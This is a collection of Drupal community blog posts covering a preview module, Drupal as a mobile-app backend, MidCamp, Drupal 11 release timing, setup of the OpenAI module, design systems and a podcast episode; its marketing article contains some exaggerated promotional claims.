Tailor your preview experience to your liking. Choose to open the display in a new window, view content in full-screen mode, or select your preferred display mode. The module is all about personalising your content editing workflow.

Custom Display Options

Why it matters 

Watch a Short Demo: https://youtu.be/Mh_plCpt1_A


The "Same Page Preview" module has recently received recognition on the Talking Drupal podcast, where its potential was discussed. Furthermore, there's an active issue in the Drupal core ideas project advocating for the inclusion of this module in the Drupal core.


In my opinion, integrating "Same Page Preview" into the Drupal core would be an invaluable asset. I've encountered numerous projects where the concept of in-page content previews has sparked considerable interest and discussion.


Join me in exploring the possibilities that this module brings to the Drupal community and in advocating for its inclusion in the Drupal core. Let's make content editing even more user-friendly and efficient.

Nov 24 2023
Nov 24

Do you know that almost 90% of developers who use Drupal as a backend for their mobile apps have their stash, lucky coding socks? This is interesting because developers believe it allows them to work more efficiently.
We may have exaggerated about 90 percent, but building a mobile app development with Drupal as a backend is perfect. There are many reasons for this because Drupal as a tool has all the necessary features and capabilities to unleash the potential of the application fully and, of course, emphasize the skill of its creator. But how does it work?
This article will look at the details of building a mobile app with Drupal. We will also discuss the advantages of Drupal for the backend and, of course, not forget about the difficulties that a developer may face. At the end of the article, we will look at effective and popular applications running on Drupal, allowing you to get acquainted with this magical system to the fullest. So let's get started!

Why would you need a Mobile App for your business?

Before we understand how Drupal helps developers create incredible mobile apps, it's worth remembering why your business needs an app. Like any business tool, a mobile application is extremely effective because most customers use smartphones daily. Thus, a Drupal mobile app can become the connection every business wants to build with its customers. Speaking more specifically about why your business needs a mobile app, the following aspects are worth mentioning:

  • Direct interaction - a mobile app allows you to "reach out" to your customers, notify them of all product updates and, of course, inform them about promotions.
  • Access at any time - the mobile app allows your customers to choose products or order services anytime. This way, you reach both those users who are used to thinking through their purchases thoroughly and those who are ready to order a new set of shoes or clothes right in the middle of the night. In addition, the app positively affects your brand awareness and allows you to create a certain company image.
  • Improving the level of loyalty - a high-quality mobile application for a client that reflects how you and your team treat your work. A high-quality app allows you to create a positive impression and gain a potential customer's trust.
  • Control and motivation - a mobile app gives you the tools to interact with and motivate customers. For example, with the help of promotions and discounts, you can stimulate customer interest in placing an order. In contrast, notifications about assortment updates will interest customers and motivate them to open the app.
  • Information and analytics - to build a successful business and attract new customers, you will need a lot of information, and a mobile app can offer it. Learn more about how much time users spend on a particular screen, understand what products they like, and offer a discount.

Having a mobile app allows you and your business to communicate with customers and clients without words. Given that a Drupal mobile app has literally unlimited potential, you can use it to achieve various goals, from increasing the number of sales to integrating a subscription system for your company's services. Such diversity is guaranteed to attract business interest. However, what role does Drupal play in all these advantages? This is what we will talk about next.

Drupal as a Backend for Mobile Apps

Can we use Drupal as the backend for mobile applications? Well, Drupal is a popular tool used in many niches. One of the main features of Drupal is its flexibility because hundreds of specialists and thousands of volunteers work on the system around the world. By involving volunteers in the development of the system, Drupal creators have found the golden fleece because every year, the joint efforts of volunteers and full-time developers provide users with new versions of Drupal and, with them, new opportunities.
In mobile applications, Drupal is implemented as a backend and serves as a tool that manages user data and the system as a whole. In addition to Drupal, you can use frameworks like React Native to develop mobile applications. React Native forms the application interface, while Drupal deals with data distribution and analysis. Due to its flexibility, Drupal is considered an ideal solution for mobile applications because it offers security in addition to a huge number of features.

Why is Drupal a suitable choice for mobile app backend development?

It is important for the user that the application they launch works not just correctly but as quickly and conveniently as possible. Due to its flexibility and range of features, Drupal is ideal for this role. Thanks to a wide range of constantly updated modules, developers can create literally any mobile application using Drupal. 
In addition, Drupal uses an API-first approach, providing reliable RESTful APIs that avoid complexities and problems between the mobile communication interface and its backend implemented in Drupal.
This feature positively impacts the speed and correctness of data management, and speed is everything regarding mobile applications. Thus, Drupa has become one of the favorites in the market of backend solutions for mobile applications, but is it enough to become a leader? In our opinion, no. That's why Drupal developers have integrated many advantages into the system, which we will discuss further.

Advantages of using Drupal as a backend for mobile apps

  1. The main advantage of Drupal that everyone knows about is, of course, flexibility. The system can work quickly with large amounts of data and has many module integration opportunities. Thus, Drupal is a universal constructor that allows you to create an application with any functionality.
  2. Drupal uses an API-oriented approach, offering reliable RESTful APIs out of the box. This fact ensures no problems when exchanging data between Drupal itself and the application interface.
  3. As a backend for a mobile application, Drupal also boasts a wide range of modules. You can easily and quickly add the necessary modules to the system to expand the application's functionality. This feature makes Drupal a universal backend solution.
  4. To justify the investment in a mobile application, it must be able to scale. The multifunctionality and unlimited possibilities offered by Drupal and its modules are invaluable for developers.
  5. Security is an extremely important aspect of any mobile application, as most applications work with sensitive user data. Drupal can offer reliable protection that is constantly being improved. Thus, by using Drupal for your mobile application, you reduce the likelihood of customer data leakage to zero and gain their trust and loyalty.

Scalability and the availability of modules with which you can customize the backend of your application - Drupal offers all this. Suppose you add to this list the exceptional level of data security and clarity of the system. In that case, Drupal is a clear favorite for the backend of mobile applications.

5 Real-life examples of successful mobile apps built with Drupal as a backend

Even though specialists created all the previously described information - all these are just words. Is there evidence of Drupal's exclusivity? Of course, there is! In order for you to personally make sure that using Drupal for the backend is a reliable solution, we are going to show you the top 5 Drupal applications that have succeeded thanks to the system's capabilities

1. The Olympics Official App

Unique Features: Thanks to the fast communication between the elements of the application, this mobile application is able to provide up-to-date information on the current situation at the Olympic Games in real time without delay or errors.
Challenges: The main challenge of implementing this application's functions was to simultaneously connect several data sources, integrate video broadcasting, and ensure that users do not experience any problems while using the application.
Drupal as a Backend: Due to the flexibility of Drupal, the developers managed not only to integrate all information sources but also to provide users with a positive experience of using the application.

2. Weather Underground App

Unique features: The Weather Underground app offers users localized weather forecasts on the subway. This allows them to successfully plan their stops and reach their destinations without encountering rain or other uncomfortable weather conditions.
Challenges: In order to provide reliable information, the application had to collect data from several resources simultaneously while implementing it in real-time.
Drupal as a backend: Thanks to its multitasking and data exchange speed, Drupal proved to be a great backend. The system easily handles the gigabytes of data constantly coming into the application, enabling users to track changes in the weather online exactly where they are and in real-time.

3. Memorial Sloan Kettering Cancer Center App

Unique features: MSKCC's app offers personalized information about cancer treatment, enables convenient communication with healthcare providers, and generally enables smartphone owners to learn more about the disease.
Challenges: The application developers' main challenge was implementing the highest level of personal data protection. However, thanks to Drupal, such protection became possible.
Drupal as a backend: Thanks to the advanced protection system that Drupal boasts, the application developers managed to implement an application with a degree of personal data protection that is not susceptible to any fraudster.

4. NBC News Mobile App

Unique features: With this application, users have the opportunity to view news that is algorithmically selected according to their interests and tastes. In addition, the app has a streaming feature so users can check out the latest news at any time.
Challenges: The application had to implement personalization by interests and functionality that would allow users to quickly absorb hundreds of articles and form a feed from them. A separate issue was the integration of video broadcasts with news.
Drupal as a backend: The availability of a large selection of modules for Drupal allowed the application developers to integrate the ability to view video broadcasts and create algorithms within the application responsible for personalizing the news feed.

5. The Weather Channel App

Unique features: The application is able to track information from all available weather stations and transmit information to the user in real-time without delay.
Challenges: The challenge of this application was the large amount of data and the large number of sources. However, thanks to Drupal multitasking, the functionality originally built into the system was fully realized.
Drupal as a backend: Thanks to the functionality of Drupal, the developers were able to achieve these indicators in terms of data transfer speed and data absorption, which ultimately allowed them to create an application with up-to-date weather that is updated in real-time.

Build a mobile app development with Drupal and the Golems team!

In order to tell you more about Drupal as a backend, we have not only gone through its features but also introduced you to real examples of applications where Drupal was able to unleash the site's full potential. However, even this is not all. It should be borne in mind that the Drupal system, as is its community, is constantly evolving. This means that there will be more and more opportunities in the future.
So, if you plan to create your own mobile application for customers, you need a backend that can quickly process a lot of data in real-time and not cause any discomfort for users - pay attention to Drupal. Start building your own mobile app with Drupal with the Golems web development agency and see the benefits of your own experience!

Nov 23 2023
Nov 23

Call for Speakers

MidCamp has hosted over 300 sessions since 2014 and we want to add your talk to that number. We’re looking for talks geared toward beginner through advanced Drupal users, as well as end users and business owners. Please see our session tracks page for full descriptions of the kinds of talks we are looking for. We'll also be holding a speaker workshop in December (date tbd) if you want to bounce around some ideas.

Submit a session now!

Important Dates:

  • Call for Proposals Open: November 22, 2023
  • Speaker Workshop: TBD
  • Proposal Deadline: December 22, 2023
  • Speakers Notified: January 23, 2024

P.S. We hear that some folks in Florida might like your submission too.

Sponsor MidCamp

MidCamp offers a variety of sponsorship packages that are designed to provide improved exposure, greater flexibility, and more opportunities for organizations to sponsor, regardless of budget. Sponsors make MidCamp possible.

We have opportunities starting at $600 and whether you’re looking to recruit new talent, grow your business, or just support the community—we have a package for you. The sooner you sign up, the more value you get.

Find the right sponsorship package for you!

Stay In The Loop

Join the MidCamp Slack and come hang out with the community online. We will be making announcements there from time to time. We’re also on X (formerly Twitter) and Mastodon.

Keep an eye on this space, we will be releasing more blog posts with venue details, hotel and travel options, fun social events, speaker announcements and more!

Have a great holiday, and don’t stop gobbling until MidCamp - in Chicago, March 20-22, 2024.

Nov 22 2023
Nov 22

New major release schedule

Beginning with Drupal 10, a new Drupal major version will be released every two years in even years (2022, 2024, etc.). Each major version will receive active support for about two years, followed by maintenance support and security coverage for about two more years. Each is supported until two more major versions have been released.

Chart illustrating the overlapping support of Drupal minor and major versions from 2024 to 2027, explained below.
This is an example.
The exact schedule varies, and will be published on the Drupal core release schedule.

Drupal 11 will be released in 2024

Drupal 11 will be released sometime in 2024. Like Drupal 9.0 and 10.0, Drupal 11.0 has three potential release windows, in June, August, and December. The window used will depend on when the beta requirements are complete. For more information, refer to the Drupal core release schedule.

Drupal 11 alpha development opens this week

Following the release of 10.2.0-beta1, changes to 11.x that diverge from Drupal 10 under the continuous upgrade path will begin. Anyone can get involved in completing the requirements for Drupal 11. Join the #d11readiness channel in the Drupal community Slack.

Maintenance minor versions of Drupal 10

Following the release of Drupal 11.0.0 in 2024, a long-term support phase for Drupal 10 begins, and it will include a new maintenance minor every six months. Each maintenance minor will contain a limited set of changes backported from Drupal 11. For more information, refer to the Drupal core release process overview.

Use a supported PHP version for the best ongoing support

Maintenance minor releases for Drupal 10 will keep adding support for newer PHP versions as they are released. The minimum supported PHP version for Drupal core follows the PHP core team's support cycle. (Reference: What does it mean for a PHP version to be supported?)

Site owners wishing to take advantage of Drupal 10's long-term support phase should ensure their platforms always use PHP versions supported by the PHP maintainers.

Announcement written in collaboration by Dave Long, Jess (xjm), Nathaniel Catchpole and Victoria Spagnolo.

Nov 21 2023
Nov 21

Authored by: Nadiia Nykolaichuk

Supercharging your workflows with artificial intelligence is one of the hottest trends of content editing on a Drupal website in 2023. Earlier this year, we published an article that explored the prospects of utilizing generative AI with CMSs like Drupal, along with an overview of some exciting Drupal modules for OpenAI/ChatGPT integration. This article will walk you through the specific steps of setting up and using one of the best options for your Drupal website — the OpenAI module. 

What the OpenAI module in Drupal is all about

The OpenAI module is a complex tool that supports a great variety of OpenAI/ChatGPT features for your Drupal website. It includes an impressive suite of submodules and an API foundation for seamless integration. 

It is worth noting that the module became a very early adopter of ChatGPT for Drupal — its first release came in January 2023. The full name of the module is OpenAI / ChatGPT / AI Search Integration. It is currently in its alpha stage but is being dynamically developed. It’s been created specifically for the latest major version of Drupal — Drupal 10, so it won’t work on older versions. 

Here are the submodules included:

  • OpenAI. This is the main module that provides an API for the integration and makes all other interactions possible.
  • OpenAI Audio. This submodule enables Drupal websites to interact with OpenAI audio (speech-to-text) endpoints.
  • OpenAI ChatGPT. This submodule provides a form in the Drupal admin dashboard for the interaction with OpenAI over the ChatGPT API endpoint.
  • OpenAI ChatGPT Devel Generate. This one helps the Devel module create more realistic dummy content using GPT and ChatGPT models, which helps in testing new functionality.
  • OpenAI CKEditor integration. This submodule adds a button for CKEditor 5 that provides AI-powered assistance with various tasks directly within the text editor.
  • OpenAI Content Tools. This one adds a set of assistive tools powered by Open AI to the content editing form.
  • OpenAI Embeddings. This submodule relies on OpenAI to analyze nodes and generate vector images and text embeddings.
  • OpenAI Log Analyzer. This one makes it easier to understand the error log entries in Drupal by providing AI-powered explanations and potential solutions. 
  • OpenAI Prompt. This submodule adds a form to the Drupal admin dashboard where you can send prompts and get responses back from OpenAI.
The list of the OpenAI module’s submodules.The list of the OpenAI module’s submodules.

Step-by-step guide on how to use the OpenAI module in Drupal

Installation and basic setup

With the OpenAI module downloaded to your Drupal 10 website, you can enable only the submodules that you’re interested in using. For our demonstration, we’ll use:

  • the OpenAI ChatGPT
  • the OpenAI CKEditor integration
  • the OpenAI Content Tools.
Enabling the specific submodules within the OpenAI suite.Enabling the specific submodules within the OpenAI suite.

To proceed to the setup, either hit “Configure” next to the main OpenAI module on the Extend page or go to Configuration > OpenAI > Settings on your Drupal admin dashboard. You’’ll see two fields for which you’ll need to provide the following credentials:

  • API key
  • organization name/ID
The fields for the credentials on the OpenAI settings page.The fields for the credentials on the OpenAI settings page.

To get the API key, log in to your Open AI account (or create a new one), select the “API” section, the top-right user account menu, and click “View API keys.” 

Finding the option to view API keys in the OpenAI user account menu.Finding the option to view API keys in the OpenAI user account menu.

You’ll need to generate a new API key, so click “Create new secret key” and optionally give it a name (for example, “Testing a Drupal module”). Copy the newly-created API key for further pasting on the Drupal website and click “Done.”

Creating a new secret key.Creating a new secret key.

To get the organization’s name or ID, go to Settings on the left-hand organization menu.

Finding the Settings page in the OpenAI organization menu.Finding the Settings page in the OpenAI organization menu.

Generally, it’s less error-prone to use the organization ID rather than a name in configuration. So copy the ID and go back to the Drupal website.

Viewing the organization name and ID.Viewing the organization name and ID.

Enter the API key and the organization ID into the appropriate fields on the OpenAI Settings page of your Drupal site. 

Pasting the API key and the organization ID on a Drupal site.Pasting the API key and the organization ID on a Drupal site.

Now that the basic setup is done, you can proceed to use specific functionalities provided by the module’s submodules.

How to use the OpenAI ChatGPT submodule

With the OpenAI ChatGPT submodule enabled you can either click “Configure” next to it on the Extend page or go to the Configuration > OpenAI and open the “ChatGPT explorer” link.

Finding the link to the ChatGPT explorer page in the Drupal admin dashboard.Finding the link to the ChatGPT explorer page in the Drupal admin dashboard.

It leads you to a UI for exploring and testing the OpenAI ChatGPT endpoint. You can enter a prompt in the “Ask ChatGPT” field and wait for the response to appear in the “Response” field.

Interacting with ChatGPT on the ChatGPT Explorer page.Interacting with ChatGPT on the ChatGPT Explorer page.

The Options tab has some settings that you don’t necessarily need to change but stick with the sensible defaults instead. Anyway, it’s useful to know what they are:

  • Model. Here, you can select a specific model out of the OpenAI’s set of models. The default one is GPT-3.5 Turbo, and that’s what is used in our demonstration. 
  • Temperature. Higher temperature values (like 0.8) provide responses that can be characterized as more random, creative, diverse, and unexpected. Responses with lower temperature values (like 0.2) are seen as more focused, deterministic, straightforward, and predictable.
  • Maximum tokens to generate. Tokens in OpenAI are the building blocks of language. A token can be from one character to one word long. Specifying maximum tokens is a way to give the model guidance on how long or short you want its responses to be. In any case, they cannot exceed your model’s context length.
  • Profile. This setting helps you shape the ChatGPT’s behavior, where the default “you’re a friendly helpful assistant” looks perfectly fine.
Available options on the ChatGPT Explorer page.Available options on the ChatGPT Explorer page.

How to use the OpenAI CKEditor integration submodule

As mentioned above, the module is designed for Drupal 10, so when we talk about CKEditor integration, we mean the new CKEditor 5. The availability of this integration makes the OpenAI module one of the most interesting Drupal modules to extend CKEditor 5

With the OpenAI CKEditor integration submodule enabled you’ll need to add the OpenAI button to CKEditor 5 toolbar. For this purpose, just go to Configuration > Content authoring > Text formats and editors and click “Configure” next to the specific format (Full HTML, Restricted HTML, or Basic HTML).

Once on the specific format’s settings page, drag the button from the “Available buttons” to the “Active toolbar.”

Adding the OpenAI button to the CKEditor 5 toolbar.Adding the OpenAI button to the CKEditor 5 toolbar.

Scroll a little down to CKEditor 5 plugin settings, find the OpenAI tools plugin, and be sure to tick the “Enabled” checkbox for the “Text completion” option. You’ll also see the settings for the model, temperature, and maximum tokens settings similar to those we’ve already described in the ChatGPT submodule part.

Setting up the “OpenAI tools” plugin for CKEditor.Setting up the “OpenAI tools” plugin for CKEditor.

Scroll down to the bottom of the page to click “Save configuration.”

With this done, you can go to Content > Add content, and see the OpenAI button on your CKEditor 5 toolbar. It opens a dropdown menu of available AI-powered actions that can be applied to text. There is an “OpenAI status: Idle” message in the bottom right corner, which will change at the moment of actual interaction. 

The menu of actions available with the OpenAI button in CKEditor.The menu of actions available with the OpenAI button in CKEditor.

If you select “Text Completion” from the dropdown, a balloon panel will appear for writing an idea or suggestion (for example, “Please write a paragraph about how AI works”). When done, click the green check mark, which you might be familiar with if you have already worked with CKEditor 5’s interface

Providing an idea for text completion in CKEditor.Providing an idea for text completion in CKEditor.

Wait for the response for a little while and the requested paragraph about how AI works appears in the text area.

An example of AI-generated text based on the provided idea in CKEditor.An example of AI-generated text based on the provided idea in CKEditor.

It is noteworthy that for other actions, you need to select the text first. 

Selecting the text to apply available actions to.Selecting the text to apply available actions to.

With the text selected, click “Summarize” — and you’ll see a summary of the text.

An example of AI-summarized text in CKEditor.An example of AI-summarized text in CKEditor.

If you select the text and click “Adjust tone/voice” in the OpenAI dropdown, it will show you a balloon panel where you’ll need to enter an adjective/descriptive phrase about what you want the tone to be like. In this example, let’s write “Fairy-tale” and hit the green check mark.

Providing a keyword for the desired tone/voice.Providing a keyword for the desired tone/voice.

In a while, the text about AI is getting transformed to become truly magical.

An example of the text tone and voice adjusted by AI in CKEditor.An example of the text tone and voice adjusted by AI in CKEditor.

If you select the text and choose “Translate” on the OpenAI dropdown, it will offer you a balloon panel for specifying the language. In this example, we’ve entered “Spanish.”

Providing the desired language for translation.Providing the desired language for translation.

And the magical fairy-tale is getting translated into Spanish directly in the text area. 

An example of the AI-translated text in CKEditor.An example of the AI-translated text in CKEditor.

To test the “Reformat/Correct HTML” options, let’s write some gibberish HTML imitating the anchor link formatting but with obvious errors. It doesn’t even matter that we’re doing it directly in the text area without going to the source code.

Writing some faulty HTML for testing purposes.Writing some faulty HTML for testing purposes.

When this line is selected and the “Reformat/Correct HTML” option is clicked, artificial intelligence successfully corrects the HTML errors and creates a normal anchor link.

An example of HTML formatting fixed by AI in CKEditor.An example of HTML formatting fixed by AI in CKEditor.

How to use the OpenAI Content Tools submodule

Besides the assistance options directly in the text editor, there are more listed to the right-hand side of the node editing form. They are provided by the OpenAI Content Tools submodule. 

As opposed to how the CKEditor integration submodule works, all suggestions by Content Tools just appear in the right-hand panel, with no changes applied to the actual node text. Let’s see what you can do here using an example of a text about SEO that has just been AI-generated in CKEditor.

You can click “Suggest taxonomy” and choose the field with the text you want to be AI-processed (in this case, it will be the body field). 

Using the “Suggest taxonomy” feature.Using the “Suggest taxonomy” feature.

AI-suggested taxonomy tags appear in a while. 

An example of AI-suggested taxonomy.An example of AI-suggested taxonomy.

Next, you can ask OpenAI to “Suggest content title” and this time, it will be the title field that you’ll need to select. In a few seconds, artificial intelligence suggests the title of the text.

An example of an AI-generated title.An example of an AI-generated title.

If you click “Summarize” and select the body field, you’ll get a summary of your text in a while.

An example of an AI-created text summary.An example of an AI-created text summary.

The “Adjust content tone” option allows you to choose the tone from the dropdown (friendly, professional, helpful, high school level reader, college-level reader, and “explain like I’m 5.” As usual, select the field for this action (in this case, body).

Selecting the tone for the “Adjust content tone” feature.Selecting the tone for the “Adjust content tone” feature.

AI provides the text option based on the selected tone (in this example, “explain like I’m 5”). The screenshot below shows OpenAI’s version of what a 5-year-old is supposed to understand (this looks a little doubtful, but we’re here just to demonstrate the features). 

Please note that using simple language is an essential practice for creating accessible content, and the “Adjust content tone” option might be interesting in this regard.

An example of AI-adjusted text tone.An example of AI-adjusted text tone.

Finally, there’s the “Analyze text” option that checks the text for compliance with various policies. Let’s use it for the body field and, as expected, there’s a confirmation from OpenAI that the text doesn’t violate anything.

The result of the AI-performed text analysis for compliance.The result of the AI-performed text analysis for compliance.

Troubleshooting

You might see the “Website encountered an unexpected error” message directly in the text area. There’s no reason to worry — the actual explanation of what happened can be found on the Reports > Recent log messages page of the Drupal website (/admin/reports/dblog). 

You might, for example, see an error log telling you there is no such organization. To fix that, you’ll need to go to the Configuration > OpenAI Settings on your Drupal admin dashboard and make sure you’ve entered the organization ID (not name). Another example is seeing the message “You exceeded your current quota, please check your plan and billing details.” This means you’ll need to go to the OpenAI website and check your plan or just test the Drupal integration from a different OpenAI account for a start. 

Being in its alpha stage, the module still has a bunch of issues that you might find helpful to check out on drupal.org if you need help troubleshooting.  

Final thoughts

It’s really inspiring to know that the “team” of Drupal modules for integration with various third-party tools has got such a brilliant addition as the OpenAI module. When used with proper caution, AI can genuinely boost the content workflows of many teams, especially on large content-heavy websites, which are abundant among our customer base. And, as we see from the list of the OpenAI submodules, some of its capabilities go beyond content, helping development and testing as well. 

Whenever you need any assistance with integrating artificial intelligence tools with your Drupal website, our experienced Drupal team will be happy to help.

Nov 21 2023
Nov 21

Claro has been the default administration theme for Drupal for more than one year now. The list of issues and new features that we want to introduce has been growing and we’d like to bring the community together to join forces and finish initiatives needed for the new improvements (like CSS modernization) or review each other's work and get it committed.

We’ll prepare and organize efforts in advance with issues for all levels and profiles, and we’ll work on several time zones.

Join this community effort on the #admin-ui Drupal Slack channel on December 15th, 2023 and we’ll have work ready for you.

Nov 21 2023
Nov 21

Introduction

When the healthcare.gov website launched in 2013, it was a complete disaster due to several reasons.

  • Initially, users had to register for an account before shopping for plans. This was a fundamental UX design flaw, causing frustration among customers.
  • 250,000 users, five times the expected amount, tried to use the website. This caused the website to crash within two hours.  
  • The website's ability to work with other sites, like the Internal Revenue Service website or the Department of Veterans Affairs site, made things worse.

Ultimately, the site was taken down during the first weekend. These sort of issues are often rooted in design debt.

Design debt involves quick design choices, compromising user experience to expedite product release. This, along with hasty coding decisions, can lead to failed product launches. 

Implementing a design system helps solve these issues and ensures efficient digital product delivery.

What Is A Design System?


A design system is a collection of reusable components with clear standards that guide teams while creating digital products. It streamlines workflows, maintains consistency, and offers a cohesive user experience.  

A design system is the single source of truth which groups all the elements that will allow the teams to design, realize and develop a product.

~ Audrey Hacq, Design System Advocate

A basic design system consists of components:

Design System Components

Style Guides

Style guides establish consistent visual and brand guidelines, including typography, color palettes, and iconography. These guides reduce errors and revisions by providing a standard reference, saving time during product development.

Spotify Style Guide

Component Libraries

Component libraries contain reusable UI elements like buttons, forms, and navigation bars. These simplify the development of the digital product, enhance consistency, and accelerate the creation of the user interface.

Shopify Polaris Component Library

Design Principles

Design principles accelerate development cycles by reducing iterations. This results in a more focused and efficient design process.

Salesforce Lightening Design System - Design Principles

Pattern Libraries

Pattern libraries are curated sets of reusable UI elements and design patterns. These promote consistency and efficiency in design and development, ensuring timely delivery.

Adobe Spectrum Pattern Libraries

Documentation

Guides and references help teams use and maintain the design system. This clear guidance minimizes errors and boosts development efficiency, leading to faster product delivery.

Storybook Documentation

Icon Library

Icon libraries provide standardized graphics that help simplify and accelerate the design and development process.

Google Icon Library - Audio and Video

UI Kits

UI kits are pre-designed sets of UI elements, which help maintain a unified look and feel of a product. Designers and developers can select and incorporate these icons, saving time and effort in creating them from scratch.

Google Material 3 Design Kit

Accessibility Guidelines

Accessibility guidelines provide a framework for maintaining inclusivity across interfaces. These guidelines include screen reader compatibility, keyboard navigation, and alternatives for non-text content.

Accessibility Guideline Example From Material Design

Design Tokens

Design tokens store design decisions like colors and typography in a reusable and consistent format. They serve as a common language between designers and developers.

Google Material Design Token

Content Guidelines

Content guidelines include rules and recommendations for producing and managing text, images, and multimedia content. The guidelines help maintain brand consistency, tone, and quality across all written and visual materials.

Mailchimp Content Guidelines

How Do Design Systems Help Businesses 

A design system offers a structured approach to fixing critical business problems.

Business Challenges

Benefits Of Implementing Design Systems

Teams Working In Silos

Teams working in silos often tend to work on similar components and solve the same design problems. This situation results in the duplication of assets and chaos.

Uber's app redesign in 2016 received negative feedback for changes in its user interface. The lack of effective collaboration between design and development teams caused confusion and led to a poor user experience.

By implementing design systems, designers and developers can align better and collaborate for faster product delivery.

New Team Member Onboarding

New team members are easier to onboard on a project with a design system. It enables them to contribute more quickly to the design and development process.  

According to an experiment by Figma, with relevant design systems, designers are 34% more productive.

High Resource Costs

Organizations tend to shy away from a design system as they don’t see the long-term benefits of implementing it. Contrary to this, design systems help organizations optimize resources, leading to a higher ROI and faster product delivery.

Smashing Magazine provides a detailed guide to calculate the ROI of a design system.

Maintain Relevance

Design systems need to evolve continuously. By using up-to-date design systems, organizations can launch market-relevant products with minimal iterations.

Google's Material Design and Apple's Human Interface Guidelines are two dynamic design systems prioritizing user-centered experiences. These systems offer extensive resources and guidance for teams.

Vital Considerations For Implementing A Design System In Your Organization

Visual design systems are based on a brand’s objectives. Regardless of the organization’s size, these offer a range of universal benefits. It’s critical to customize the design system to align with a brand's unique needs and scale. 

Here are some vital considerations for implementing a design system in your organization:

Establish Visual Branding

Ideally, you should ensure your product's visual branding is in place. For this, you need to make definitive decisions with your core team. Commit to your choice for at least a few years, which helps establish stability and consistency. 

Spotify's visual branding centers on vibrant green showcased in a distinctive circular logo. While Spotify has subtly adjusted its visual branding over the years to stay current with design trends, core elements like the green color and circular logo have remained consistent.

If your organization's visual branding is still in progress, finalize it before developing any content library or comprehensive design system. 

Evaluate Tech Stack And Platforms

If you have the visual branding established, assess the brand's tech stack and check its compatibility with the design system. If that is not an immediate option, consider starting with a small yet scalable content library.

Ready-to-use platforms like Storybook are great if you want to opt for a plug-and-play structure. Use them for building content libraries, which eventually expand into a complete design system.

Opt For Custom Design Systems

Organizations with a mature digital product and well-defined brand vision should go for customized design systems. The systems should draw inspiration from the brand's existing digital assets and guidelines, if any.

IBM's Carbon design system was instrumental in designing and developing a new self-service purchase experience on IBM.com. After the transition, over 50% of customers started converting, which was a large increase in orders and revenue.

Consider Creating A Custom Typeface

You can also opt for a custom typeface to leverage your existing design system. Changing the typeface across your digital product is a rebranding process. It is an idea worth exploring if you’re aiming to enhance brand recognition.  

Airbnb’s custom typeface Cereal helps establish a distinct and cohesive visual language for the brand. Brands like Netflix, ​​General Electric, Intel, and Coca-Cola also have custom typefaces across their products.

How Axelerant Contributed To Red Hat’s Developer Portal’s Design System

For over eight years, Axelerant has been a trusted partner in delivering technology and design services to Red Hat. In a collaborative effort, Axelerant’s experts played a crucial role in enhancing the effectiveness of the brand’s existing design system by:

Resolving Typography Inconsistencies

Axelerant’s experts helped resolve font size inconsistencies in adopting the design system by renaming typography and defining when and where they could be used.  

Extending The Design System

Red Hat’s web guidelines were well-defined, but there were no specific directives for mobile interfaces. The team needed to create mobile-responsive states missing from the existing design system. Mobile responsive UI components were added as a solution to this.

Introduction Of Tiles UI Components

Red Hat’s content types, including blogs, cheat sheets, ebooks, interactive tutorials, and events, were presented in irregular box sizes on the portal. To address this issue, consistent tile components with standardized dimensions were implemented. The content was reorganized within these tiles to establish a higher level of uniformity throughout the platform.

This new and improved design system in place will help the brand accelerate product delivery.

At Axelerant, we help organizations create new or leverage existing design systems to streamline digital product delivery. Schedule a call with our experts to learn more. 

Nov 20 2023
Nov 20

Today we are talking about the a new Drupal Book Modernizing Drupal 10 Theme Development, What’s new in Drupal 10 theming, and tools that can help speed up theming with guest Luca Lusso. We’ll also cover Admin Dialogs as our module of the week.

For show notes visit:
www.talkingDrupal.com/425

Topics

  • Why write a book about Drupal theming
  • How does the book modernize theming
  • Who is the book for
  • Do you have to have a certain level of knowledge to start
  • What are some new aspects of Drupal 10 that are covered in the book
  • Does the book talk about:
    • Javascript frameworks
    • Native Web Components
  • What tools outside of Drupal do you talk about
  • How did you conduct your research
  • Do you have plans to keep the github updated
  • How long did it take to write the book
  • Tech moves quickly, what is the shelf-life of the book
  • Future editions
  • Purchase from Amazon or Packt
  • Translation
  • Plans for another book

Resources

Guests

Hosts

Nic Laflin - nLighteneddevelopment.com nicxvan
John Picozzi - epam.com johnpicozzi
Melissa Bent - linkedin.com/in/melissabent merauluka

MOTW

Correspondent

Jacob Rockowitz - @jrockowitz

  • Brief description: (from the maintainer)
  • Brief history
    • How old: Created on May 2023
    • Versions available: 1.0.x stable release
    • Last release: 1.0.17 - July 12, 2023
  • Maintainership
    • Actively maintained? Yes
    • Number of open issues: 6
    • Test coverage
      • No test coverage
      • Module is fairly simple and easy to manually test
      • Code quality is very good
  • Usage stats:
    • sites 150+
  • Maintainer(s):
  • Sponsor
    • Chapter Three
  • Module features and usage
    • Comes with the ability to add modal or off-canvas dialogs to different links in Drupal.
    • Easy to use. Most features available after installing the module.
    • Adds controls dialog type for operation links like Edit, Delete etc.
    • Adds and controls dialog type for local tasks.
    • Adds and controls dialog types for local actions.
    • Ability to add dialogs via specified A tag paths.
    • Ability to add dialogs via specifying CSS selectors (classes and IDs).
    • Adds option to control delete button dialog.
    • You can add support for your modules by adding configs created in the module.
    • Experimental: Add loading spinner to form submit elements on form submit.
  • Discussion
    • The module does one thing and does it really well
    • Require no initial configuration.
    • Worth reviewing common administration tasks for contributed modules and deciding if a modal dialogs or sidebar can improve the admin UX.
Nov 20 2023
Nov 20

In our previous article, we went over the basics of how Drupal handles revisions and content moderation. But one of Drupal's strengths is what we call "structured content" and its ability to implement complex content models, as opposed to a big blob of HTML in a WYSIWYG field. Entities can have lots of different fields. Those fields can refer to other entities that also have lots of other fields. It is easy to establish content relationships. 

Even with Drupal websites that don't have complex content requirements, there are almost always a few entity reference fields that carry a lot on their shoulders. An article might reference other related articles. An album might reference an "artist" content type. A biography might reference an "address" content type.

And to make things easier for editors, Drupal also has tools to allow inline editing of this referenced content within the context of a parent entity. But this lays potential, unexpected traps. When using content moderation and revisions with structured content, there are some dangers involved that you should be aware of.

Implementation approaches for structured content

The more structured we have our content, the more responsibility we take on to make sure we implement that structured content responsibly.

We won't go over details about why structured content is preferable in modern content-rich sites and will assume you have already decided to move away from the everything-in-a-single-field as much as possible. For our purposes, “structured content” will mean a set of relationships between “components” that constitute the pieces of your content.

In Drupal, when we want to create entity relationships, there are several implementation options, each with its pros and cons. We will focus here on two of the most popular implementation approaches: Entity reference fields and Paragraphs.

